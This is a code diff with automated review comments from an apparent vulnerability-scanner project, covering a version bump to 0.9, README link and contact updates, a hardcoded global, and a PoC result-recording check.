self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
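Review bot: The added `(md + ".txt") not in req.text` clause carries no explanation, so the next reader cannot tell whether it rules out an error page that echoes the requested path, a directory listing, or something else; put the reason above the `if`, hedged if it is not certain: `# NOTE(review): presumably a page that merely echoes the requested filename (error/listing page) is not a real hit -- confirm`. Since `req.status_code == 200` is the cheapest of the three tests it could also go first, `if req.status_code == 200 and md in misinformation(req.text, md) and (md + ".txt") not in req.text:`, so `misinformation` is not run on a 404 body. The enclosing method starts and ends outside the hunk.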


@@ -30,7 +30,7 @@ python3 vulmap.py -u http://example.com
使用 Fofa or Shodan 需要修改 vulmap.py 中的配置信息:
* Fofa info: https://fofa.so/user/users/info
* Fofa info: https://fofa.info/user/users/info
```bash
# 把xxxxxxxxxx替换成fofa的邮箱
globals.set_value("fofa_email", "xxxxxxxxxx")
@@ -71,7 +71,7 @@ globals.set_value("ceye_token", "xxxxxxxxxx")
## 🙋 Discussion
* Vulmap Bug 反馈或新功能建议[点我](https://github.com/zhzyker/vulmap/issues)
* Twitter: https://twitter.com/zhzyker
* WeChat: ~二群已开放~ 又满了,再加我拉吧
* WeChat: ~~扫码入群聊~~群聊满200了扫码再加群了
<p>
<img alt="QR-code" src="https://github.com/zhzyker/zhzyker/blob/main/my-wechat.jpg" width="20%" height="20%" style="max-width:100%;">
</p>


@@ -1 +1 @@
0.8
0.9


@@ -28,13 +28,13 @@ def config():
}
globals.init() # 初始化全局变量模块
globals.set_value("UA", args.ua) # 设置全局变量UA
globals.set_value("VUL", args.vul) # 设置全局变量VULN用于判断是否漏洞利用模式
globals.set_value("VUL", None) # 设置全局变量VULN用于判断是否漏洞利用模式
globals.set_value("CHECK", args.check) # 目标存活检测
globals.set_value("DEBUG", args.debug) # 设置全局变量DEBUG
globals.set_value("DELAY", args.delay) # 设置全局变量延时时间DELAY
globals.set_value("DNSLOG", args.dnslog) # 用于判断使用哪个dnslog平台
globals.set_value("DISMAP", "flase") # 是否接收dismap识别结果(false/true)
globals.set_value("VULMAP", str(0.8)) # 设置全局变量程序版本号
globals.set_value("VULMAP", str(0.9)) # 设置全局变量程序版本号
globals.set_value("O_TEXT", args.O_TEXT) # 设置全局变量OUTPUT判断是否输出TEXT
globals.set_value("O_JSON", args.O_JSON) # 设置全局变量OUTPUT判断是否输出JSON
globals.set_value("HEADERS", header) # 设置全局变量HEADERS
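Review bot: The new `globals.set_value("VULMAP", str(0.9))` derives the version string from a float literal, which silently breaks on the next bump (`str(0.10)` is "0.1") and duplicates the value already kept in the VERSION file changed in this same compare; use a string literal, `globals.set_value("VULMAP", "0.9")`, or better read that file once so there is a single source of truth. The other new line hardcodes `globals.set_value("VUL", None)` while its trailing comment still says the global decides exploit mode; change the comment to say the value is now always None and kept only for any reader that still looks it up, or remove the key once no reader remains. The pre-existing `"flase"` on the DISMAP line below is still a typo, and any consumer comparing against "false" will never match it. The rest of `config` is outside the hunk.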